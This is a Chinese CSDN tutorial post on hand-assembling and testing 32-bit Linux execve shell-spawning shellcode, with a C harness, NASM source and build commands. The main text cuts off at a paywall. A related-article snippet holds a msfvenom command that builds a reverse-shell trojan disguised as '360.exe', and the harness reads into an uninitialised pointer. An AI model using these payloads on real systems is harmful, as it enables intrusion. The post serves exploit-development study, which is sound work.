PWN基础11:手动制作shellcode并测试

最新推荐文章于 2024-07-29 18:33:52 发布
最新推荐文章于 2024-07-29 18:33:52 发布
阅读量882 收藏 3
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettyX/article/details/107342545
版权
本文介绍了如何手动制作shellcode并进行测试。首先展示了用于测试的shellcode代码,然后通过nasm汇编器将其编译为.o文件并链接成可执行文件shellcode32。接着,提取了code段的二进制数据,并对比了shellcode与shellcode32的属性差异。shellcode是二进制形式,而shellcode32包含更多ELF信息。为了执行shellcode,需要将它加载到正确地址,可以通过特定的C程序(shellcode_test)来测试。文章最后鼓励读者对错误进行指正。
摘要由CSDN通过智能技术生成

用于测试shellcode的代码如下

#include <stdio.h>

void main()
{
    char *shellcode;
    read(0,shellcode,1000);
    void(*run)()=shellcode;
    run();
}

下面是我们要测试的shellcode,在上一节课,我们用到的

(上一节课:https://blog.csdn.net/prettyX/article/details/107301127)

;shellcode32.asm
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor edx,edx
push 11
pop eax
int 0x80

使用汇编器nasm把shellcode编译成.o文件

nasm -f elf32 -o shellcode32.o shellcode32.asm

链接生成可执行文件

ld -m elf_i386 -o shellcode32 shellcode32.o

此时生成的shellcode32已经可以执行了

最低0.47元/天 解锁文章
prettyX
关注
专栏目录
解析两道pwnshellcode利用
weixin_44113469的博客
03-12 2045
两道题都是shellcode直接利用,简单记录解题的过程。 runit 逻辑不难,使用mmap()分配一块内存,然后通过read函数写入数据到这个内存块,接下来就直接执行我们输入的数据,所以可以直接构造shellcode注入到该内存块,完事。 exp ...
简单的shellcode制作
renyizou的博客
06-16 247
一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马 此时还需要一个监听端--msf的监听模块 use exploit/multi/handler 设置好lhost和lpost,记得设置payload,开启监听 运行木马 就能建立session,直接就进去了 linux ..
pwn入门——5.shellcode
最新发布
weixin_62626298的博客
07-29 188
本节只会讲解,因为我觉得,对于入门来说,首先要会用,我们用多了,慢慢就会理解它的涵义,大家也可以去自行找相关资料来了解学习。
shellcode编写
qq_39153421的博客
08-02 1117
1.前言漏洞利用最重要的就是shellcode编写,漏洞发现者在漏洞发现之初并不会给出完整的shellcode,所以我们要学会自己编写shellcode。注:shellcode不能出现NULL和/x00,存在其一再利用的时候会被截断。 2.什么是Shellcode shellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击...
手动制作shellcode
fanghuapyk的博客
03-19 637
概括: 我们要将自己生成的shellcode汇编文件,编译为.o文件,然后再编译为可执行文件,然后将可执行文件的有用的代码段单独复制出来,最后我们利用python脚本将我们的这一个文件发送到测试的程序去 一:准备shellcode文件 1将汇编代码文件shellcode_32.Asm代码编译为shellcode_32.o文件 命令为:nasm -f elf32 -o shellcode_32.o shellcode_32.asm push 0x68 push 0x732f2f2f push 0x6e6
编写ShellCode
十年磨一剑,霜刃未曾试!
01-10 575
1、首先获取Kernel32.dll的基址。 2、从Kernel32的导出表里获取LoadLibraryA和GetProcAddress的地址。 3、调用LoadLibrary和GetProcAddress操作API函数。 4、将代码转成十六进制,定义成一个数组,分配一块内存,然后call。
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1068
0x01 Ret2Text的局限性
shellen:交互式shellcode环境,可轻松制作shellcode
02-05
Shellen是一个交互式的shellcode环境。 如果您想要一个方便的工具来编写Shellcode,那么Shellen可能是您的朋友。 Shellen也可以用作组装或拆卸工具。 和引擎用于Shellen的所有操作。 Shellen仅适用于python3 。 ...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
PWN2PLY:从PWN格式到PLY格式的转换器-matlab开发
05-30
PWN2PLY 是一个 GUI 应用程序,专门用于将 PWN 文件转换为 PLY ... PWN 子文件夹有几个 PWN 文件可用: -Incomplete_squirrel.pwn - Low_sampling_sphere.pwn - Stanford_bunny.pwn - Stanford_dragon.pwn - 圆环.pwn
基于C++ shellcode及植入目标程序【100011896】
04-12
整体流程主要分为两部分,一是shellcode的生成;二是向目标程序植入shellcode。植入过程主要分为两步:检验当前文件是否为PE文件,是否已被感染 (参照judgePE函数);将shellcode植入目标节,并依据PE文件格式,进行相关参数的修改(参照infect函数)。
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
PWN-shellcode获取与编写
热门推荐
杀生丸?不,其实我要的是桔梗
03-16 1万+
当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。 而shellcode该怎么获得呢? 一、获取集成写好的 1.From pwntools (1)先设置目标机的参数 context(os=’linux’, arch=’amd64’, log_level=’debug’) 1. os设置系统为linux系统,在完成ctf题目的...
Pwn手动制作shellcode测试
weixin_52553215的博客
05-26 459
1.测试shellcode的代码:shellcode_32.c 编译生成shellcode_test(注意取消NX保护,32、64位要区分) 2.shellcode_32.asm源码 3. (1)使用汇编器nasm把shellcode_32.asm编译成shellcode_32.o文件 (2)shellcode_32.o链接生成可执行文件shellcode_32_exe(可省略) (3)从 shellcode_32.o或shellcode_32_exe 提取code段,生成shell..
打造200字节的最短通用ShellCode
木休的斋堂
03-14 1849
本篇文章源自《黑客防线》2007年4月刊 作者:王炜/ww0830 ShellCode,在保持对各个版本通用性的基础上,当然是越短越好,这不仅仅是黑客艺术对简单美的追求,更重要的是有时候能利用的空间只有这么少。这不,这次我就遇到了长度限制只有210字节的情况。网上看了一下,属于比较短的ShellCode有“382 bytes bind port shellcode for win2k all
PWN-shellcode-WP- (一)
qq_43390703的博客
03-29 1168
BITSCTF 2017-Command_Line、CSAW Quals CTF 2017-pilot、BSides San Francisco CTF 2017-b_64_b_tuff、 Openctf 2016-tyro_shellcode1比赛WP,从栈的结构、排列,汇编底层去分析理解,一步一步的解题过程,通俗易懂且详细
PWN初体验之ret2shellcode
weixin_43137410的博客
08-07 699
所有的热爱都应该被坚持,人这一辈子太短了,无论如何都要为自己的热爱拼搏一次,就算最后失败了,至少不会后悔!
编写并提取简易 ShellCode
weixin_30790841的博客
08-26 224
ShellCode 通常是指一个原始的可执行代码的有效载荷,ShellCode 这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上的交互 Shell 的访问权限,而现在通常用于描述一段自包含的独立的可执行代码片段。 ShellCode 通常会与漏洞利用并肩使用,或是被恶意代码用于执行进程代码的注入,漏洞利用等,通常情况下 ShellCode 代码无法独立运行,必须依赖于父进程或是 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值